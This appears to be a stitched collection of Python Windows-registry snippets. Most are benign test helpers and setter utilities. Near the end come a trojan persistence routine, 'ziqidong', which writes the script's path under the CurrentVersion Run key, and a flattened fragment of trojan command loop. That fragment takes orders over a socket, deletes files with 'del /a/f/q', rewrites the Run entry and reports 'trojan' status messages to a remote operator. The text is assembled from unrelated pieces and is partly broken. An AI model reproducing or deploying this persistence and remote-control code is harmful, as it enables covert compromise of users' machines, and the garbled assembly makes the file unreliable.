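def setup_module(machinery, name, path=None):
    """Register a throwaway module *name* in the Windows registry for the
    duration of a ``with`` block.

    This is a generator body; the ``contextlib.contextmanager`` wrapper is
    applied where the helper is defined (outside this view).  A temporary
    module file is created through ``temp_module`` and its ``.py`` path (or
    *path*, when given) is stored as the default value of the
    WindowsRegistryFinder key for *name*.  On exit the key -- or, if the
    PythonCore key did not exist beforehand, that whole key -- is removed
    with ``delete_registry_tree``.

    The removal is deliberately bounded: the formatted key must live under
    ``Software\\Python\\PythonCore\\<major>.<minor>``, otherwise the helper
    refuses to run.  The check is an explicit ``raise`` rather than an
    ``assert`` so that ``python -O`` cannot strip the guard that stands
    between a bad key template and a recursive registry delete.

    Args:
        machinery: the ``importlib.machinery`` module under test.
        name: fully qualified module name to register.
        path: path string to store in the registry; defaults to the
            temporary module's ``.py`` file.

    Raises:
        AssertionError: if the formatted key is not under the per-version
            PythonCore key.
    """
    if machinery.WindowsRegistryFinder.DEBUG_BUILD:
        root = machinery.WindowsRegistryFinder.REGISTRY_KEY_DEBUG
    else:
        root = machinery.WindowsRegistryFinder.REGISTRY_KEY
    # Built from sys.version_info rather than sys.version[:3], which would
    # truncate "3.10" to "3.1".
    key = root.format(fullname=name,
                      sys_version='%d.%d' % sys.version_info[:2])
    base_key = "Software\\Python\\PythonCore\\{}.{}".format(
        sys.version_info.major, sys.version_info.minor)
    # Safety net for the delete_registry_tree() call in the finally block.
    if not key.casefold().startswith(base_key.casefold()):
        raise AssertionError(
            "expected key '{}' to start with '{}'".format(key, base_key))
    # Initialised up front so the finally block cannot hit an unbound name
    # if temp_module() itself fails.
    delete_key = None
    try:
        with temp_module(name, "a = 1") as location:
            try:
                # Existence probe only; the handle is released immediately.
                with OpenKey(HKEY_CURRENT_USER, base_key):
                    pass
            except OSError:
                # The PythonCore key was absent, so the whole subtree we are
                # about to create is ours to remove afterwards.
                delete_key = base_key
            else:
                if machinery.WindowsRegistryFinder.DEBUG_BUILD:
                    delete_key = os.path.dirname(key)
                else:
                    delete_key = key
            if path is None:
                path = location + ".py"
            # Scope the created handle so it is closed before the body runs
            # and before the tree is deleted.
            with CreateKey(HKEY_CURRENT_USER, key) as subkey:
                SetValue(subkey, "", REG_SZ, path)
            yield
    finally:
        if delete_key:
            delete_registry_tree(HKEY_CURRENT_USER, delete_key)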
def maybe_set_key(key_path: str, expected: str, dry_run: bool = False, var_name: str = None):
    """Make ``HKEY_CLASSES_ROOT\\key_path`` hold *expected*, writing only if needed.

    The current value is read first -- the key's default value, or the
    named value *var_name* when given -- and compared with *expected*.  A
    missing key or value reads as ``None``.  Only on a mismatch is the
    value written as ``REG_SZ`` (the key is created if absent); with
    *dry_run* the intended write is logged instead.

    Note that HKEY_CLASSES_ROOT is the merged, machine-wide view of COM and
    file-association registrations, so a write here normally requires an
    elevated process and is visible to every user of the machine.  The
    function performs the write exactly as requested and does no
    validation of *key_path* or *expected*.

    Args:
        key_path: subkey path relative to HKEY_CLASSES_ROOT.
        expected: the string the value should contain.
        dry_run: if true, only log what would change.
        var_name: named value to read/write; ``None`` means the key's
            default (unnamed) value.
    """
    from winreg import HKEY_CLASSES_ROOT, OpenKey, QueryValue, CreateKeyEx, SetValue, REG_SZ, KEY_WRITE, KEY_READ
    from winreg import QueryValueEx, SetValueEx

    def read_current():
        # Absent key or absent named value both surface as FileNotFoundError.
        try:
            with OpenKey(HKEY_CLASSES_ROOT, key_path, 0, KEY_READ) as handle:
                if var_name:
                    return QueryValueEx(handle, var_name)[0]
                return QueryValue(handle, None)
        except FileNotFoundError:
            return None

    current = read_current()
    if current == expected:
        log.info(f'Already contains expected value: HKEY_CLASSES_ROOT\\{key_path}')
        return

    prefix = '[DRY RUN] Would set' if dry_run else 'Setting'
    if var_name:
        log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path}[{var_name!r}] = {expected!r}')
    else:
        log.info(f'{prefix} HKEY_CLASSES_ROOT\\{key_path} = {expected!r}')
    if dry_run:
        return
    with CreateKeyEx(HKEY_CLASSES_ROOT, key_path, 0, KEY_WRITE) as handle:
        if var_name:
            SetValueEx(handle, var_name, 0, REG_SZ, expected)
        else:
            SetValue(handle, None, REG_SZ, expected)  # noqa
def test_long_key(self):
    """Exercise a 256-character subkey name under ``self.test_key_name``.

    Creates the test key in HKCU, stores ``'x'`` as the default value of a
    256-character-long subkey, then queries the key's info and enumerates
    its first subkey.  Cleanup always runs: the long subkey is deleted
    through a handle opened with KEY_ALL_ACCESS, then the test key itself.
    """
    from winreg import (HKEY_CURRENT_USER, KEY_ALL_ACCESS, CreateKey, SetValue,
                        EnumKey, REG_SZ, QueryInfoKey, OpenKey, DeleteKey)
    long_name = 'x' * 256
    try:
        with CreateKey(HKEY_CURRENT_USER, self.test_key_name) as test_key:
            SetValue(test_key, long_name, REG_SZ, 'x')
            subkey_count, value_count, modified = QueryInfoKey(test_key)
            EnumKey(test_key, 0)
    finally:
        # Reopen with full access so the long subkey can be deleted.
        with OpenKey(HKEY_CURRENT_USER, self.test_key_name, 0,
                     KEY_ALL_ACCESS) as test_key:
            DeleteKey(test_key, long_name)
        DeleteKey(HKEY_CURRENT_USER, self.test_key_name)
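def setup_module(machinery, name, path=None):
    """Register a throwaway module *name* in the Windows registry for the
    duration of a ``with`` block.

    This is a generator body; the ``contextlib.contextmanager`` wrapper is
    applied where the helper is defined (outside this view).  A temporary
    module file is created through ``temp_module`` and its ``.py`` path (or
    *path*, when given) is stored as the default value of the
    WindowsRegistryFinder key for *name*.  On exit the key (its parent, for
    debug builds) is removed with ``delete_registry_tree``.

    Two fixes over the naive version: the version string is derived from
    ``sys.version_info`` (``sys.version[:3]`` yields ``"3.1"`` on Python
    3.10+, pointing the key at the wrong interpreter), and the recursive
    delete is bounded to ``Software\\Python\\PythonCore\\<major>.<minor>``
    by an explicit check that ``python -O`` cannot strip.

    Args:
        machinery: the ``importlib.machinery`` module under test.
        name: fully qualified module name to register.
        path: path string to store in the registry; defaults to the
            temporary module's ``.py`` file.

    Raises:
        AssertionError: if the formatted key is not under the per-version
            PythonCore key.
    """
    if machinery.WindowsRegistryFinder.DEBUG_BUILD:
        root = machinery.WindowsRegistryFinder.REGISTRY_KEY_DEBUG
    else:
        root = machinery.WindowsRegistryFinder.REGISTRY_KEY
    # sys.version[:3] truncates "3.10" to "3.1"; use version_info instead.
    key = root.format(fullname=name,
                      sys_version='%d.%d' % sys.version_info[:2])
    # Safety net for the delete_registry_tree() call in the finally block:
    # never delete a tree that is not under the per-version PythonCore key.
    base_key = "Software\\Python\\PythonCore\\{}.{}".format(
        sys.version_info.major, sys.version_info.minor)
    if not key.casefold().startswith(base_key.casefold()):
        raise AssertionError(
            "expected key '{}' to start with '{}'".format(key, base_key))
    try:
        with temp_module(name, "a = 1") as location:
            if path is None:
                path = location + ".py"
            # Scope the created handle so it is closed before the body runs
            # and before the tree is deleted.
            with CreateKey(HKEY_CURRENT_USER, key) as subkey:
                SetValue(subkey, "", REG_SZ, path)
            yield
    finally:
        if machinery.WindowsRegistryFinder.DEBUG_BUILD:
            key = os.path.dirname(key)
        delete_registry_tree(HKEY_CURRENT_USER, key)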
def test_simple_write(self):
    """Round-trip a REG_SZ default value through SetValue/QueryValue.

    Stores a string as the default value of ``self.test_key_name`` under
    ``self.root_key`` and checks that reading it back yields the same
    string.
    """
    from winreg import SetValue, QueryValue, REG_SZ
    expected = "Some Default value"
    SetValue(self.root_key, self.test_key_name, REG_SZ, expected)
    stored = QueryValue(self.root_key, self.test_key_name)
    assert stored == expected
def windows_registry_set_key(key_path, value):
    """Store *value* as the default (unnamed) REG_SZ value of
    ``HKEY_CURRENT_USER\\key_path``.

    Only the current user's hive is written.  The key handle returned by
    ``CreateKey`` is released when the ``with`` block exits.  *key_path*
    and *value* are used exactly as given -- callers are responsible for
    not passing attacker-controlled paths here.
    """
    from winreg import CreateKey, SetValue, HKEY_CURRENT_USER, REG_SZ
    with CreateKey(HKEY_CURRENT_USER, key_path) as target:
        # sub_key=None addresses the key's own default value.
        SetValue(target, None, REG_SZ, value)
def ziqidong():
    # NOTE (security review): this is a persistence routine, not a utility.
    # It writes the running script's own path (argv[0], forward slashes
    # normalised to backslashes) under
    # HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, the
    # per-user auto-start location.  The adjacent code on this page reports
    # "木马" ("trojan") status messages to a remote socket, so treat this as
    # malware; it must not be executed outside an isolated lab.
    #
    # Detection/behaviour notes for defenders: SetValue(key, "Run", ...)
    # sets the *default* value of the ``Run`` subkey (creating it if
    # absent) rather than a named auto-start entry, and the key is opened
    # with OpenKey's default (read) access, so on a real system this write
    # may fail with a permission error -- verify on a target build.  The
    # key handle is never closed.
    caller_file = argv[0]
    caller_file = caller_file.replace('/', '\\')
    # Disabled variant that would point the entry at a .exe instead of .py.
    #caller_file = caller_file.replace('py', 'exe')
    key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion")
    SetValue(key, "Run", REG_SZ, caller_file)
t = 1 break elif lei == '4': c = s.recv(100).decode('utf-8') if c == '0': caller_filez = argv[0] caller_filez = caller_filez.replace('/', '\\') caller_file = caller_filez.replace('win_64.exe', 'win_64_1.txt') minglin = r'del /a/f/q {}'.format(caller_file) system(minglin) caller_file = caller_filez.replace('win_64.exe', 'win_64_2.txt') minglin = r'del /a/f/q {}'.format(caller_file) system(minglin) kong = '' key = OpenKey(HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion") SetValue(key, "Run", REG_SZ, kong) cc = '它自毁了,请节哀,并准备下一个目标吧|斜眼笑|' s.send(cc.encode('utf-8')) continue ziqidong() caller_file = argv[0] caller_file = caller_file.replace('/', '\\') caller_file = caller_file.replace('py', 'exe') c = '木马:已再次写入注册表'+'\n具体目录为:'+caller_file s.send(c.encode('utf-8')) else: print('收到垃圾信息') sleep(30) break if t == 1: s.send('木马已被kill,他(她)暂时安全了'.encode('utf-8'))